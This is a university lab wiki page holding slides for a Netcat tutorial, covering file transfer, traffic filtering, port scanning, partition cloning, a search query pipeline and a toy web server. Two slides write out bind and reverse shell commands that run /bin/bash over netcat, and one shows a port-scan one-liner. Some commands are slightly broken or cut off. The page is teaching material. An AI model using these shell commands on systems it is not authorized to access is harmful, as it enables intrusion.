Esercitazione 1

Nell'esercitazione del 13/11, abbiamo visto due temi d'esame. Qui trovate i file relativi:

Slide del seminario di oggi

(usate tpp per visualizzarle)

--author Giovanni Agosta
--title Netcat Tutorial
--date today

An introduction to Netcat, the TCP/IP Swiss Army Knife

--newpage intro
--heading What is Netcat?

  * Basically, Netcat opens a TCP (or UDP) connection to a given set of address and port

  * The connection then functions as a pipe in both senses 
     - Anything sent to stdin is copied to the stdout of the other machine

  * Thus, it serves a purpose similar to pipes, but allows processes on different machines to be composed

  * And now, 9 quick & dirty tricks with Netcat!

--newpage cat
--heading 1 Chat & File Transfer

nc -l -p <#port> 

nc localhost <#port>
nc <#address> <#port>

  * Use redirection of stdin/stdout to perform file transfer
  * Use -q to force termination after end of input or a given time
  * Communication is bidirectional

--newpage socket
--heading 2 Handling Information Requests

You can make up a simple server to make information available on a given port:

while true ; do cat /proc/loadavg | nc -l p <#port> -q 1 > logfile.log ; done

  * This script returns the current content of the loadavg file from procfs to any request
  * It can be used to implement a quick and dirty version of process B from the exam of March 9, 2006

--newpage filter
--heading 3 Filter Network Traffic

Redirecting a streams on a given port through filters and finally to the actual server, which has been set to listen to a different port.

mkfifo back
nc -l -p <#expectedport> 0<back | <infilter> | nc localhost <#actualport> | <outfilter> >back

  * Use a fifo to handle backward dataflow
  * Use a couple of netcat server and client to redirect traffic
  * Use any program or script to filter incoming and outcoming data

--newpage scanning
--heading 4 Port Scanning

Finding open ports and associated servers at a given address

nc -v -z -w 1 <#address> <#port>-<#port>

  * Scans all ports in a range at the given address
  * Uses no input or output (-z)
  * Drops the connection after 1 second
  * Prints out the active ports (using the verbose option)

--newpage telnet
--heading 5 Telnet

On the local machine
nc <#address> <#port>

On the remote machine
nc -l <#port> -e /bin/bash

  * You obtain a shell into the remote machine

--newpage reverse
--heading 6 Reverse Telnet 

On the local machine
nc -l -vv <#port>

On the remote machine
nc -vv <#address> <#port> -e /bin/bash

  * You obtain a shell into the remote machine
  * Use cryptcat (netcat + blowfish) for such uses!

--newpage partition
--heading 7 Partition Cloning over the Network

Copying an entire partition to a different machine:

dd if=/dev/<#partition> | netcat <#address> <#port>
netcat -l -p <#port> | dd of=/dev/<#partition>

  * Uses dd to read and write to/from the partition
  * Both partitions should be unmounted

--newpage search
--heading 8 Search Engine Querying

Querying the Google search engine:

echo -e "GET /search?q=Mystara HTTP/1.1\nUser-agent: Mozilla\n\n" | netcat 80 | sed -e 's/\(<a href[^<>]*>\)/\n\1\n/g' | grep href=\"http | grep -v google | grep -v cache | sed -e 's/<a href=\"\([^\"]*\)\"[^>]*>/\1/g'

Let's have a look at the individual filters

--newpage search2
--heading Search Engine Querying

echo -e "GET /search?q=Mystara HTTP/1.1\nUser-agent: Mozilla\n\n"

  * Build the query string as HTTP GET, specifying a valid (although ultimately fake) agent to avoid error messages such as "frames not supported"
  * Output the query to stdout

netcat 80

  * Redirect stdin to at port 80
  * At the same time, redirect response from to stdout

--newpage search3
--heading Search Engine Querying

sed -e 's/\(<a href[^<>]*>\)/\n\1\n/g'
sed -e 's/<a href=\"\([^\"]*\)\"[^>]*>/\1/g'

  * sed is a stream editor, runs as a filter
  * -e executes the following string as a sed script
  * s/<pattern>/<replacement>/g replaces every instance of the pattern within the input stream with the replacement string
  * \1 is a positional reference to the part of the pattern within \( \)

--newpage search4
--heading Search Engine Querying

  * Google's html comes without line breaks
  * The first sed filter puts each hyperlink on its own line 
  * Now we can grep for lines that contain an hyperlink

grep href=\"http | grep -v google | grep -v cache

  * But not an internal hyperlink (either cache or links to other Google services)

--newpage webserver
--heading 9 A Web Server

mkfifo p ; mkfifo f ; cat f > p &

while true ; do 
  nc -v -q 2 -l -p 8080 0<p | \
  grep -m1 GET | \
  sed -e 's/GET \/\([^ ]*\) HTTP[/0-9.]*/cat \/var\/www\/html\/\1 >f /ep ; q' \
  2>webserver.log ; 

--newpage conclusion
--heading Conclusion

--center Like its namesake, netcat has (at least) 9 lives ;)

   /\_/\         Examples from:
  / 0 0 \          Few Useful Netcat Tricks (1-7)
 ====v====         the OpenBSD netcat documentation (8)
  \  W  /          and yours truly (9)
  |     |     _
  / ___ \    / 
 / /   \ \  |  
(      ___     
 \__.=|___E      (ascii art from
teaching/labsw/esercitazione_1.txt · Last modified: 2008/11/25 17:54 by agosta
Recent changes RSS feed Creative Commons License Donate Driven by DokuWiki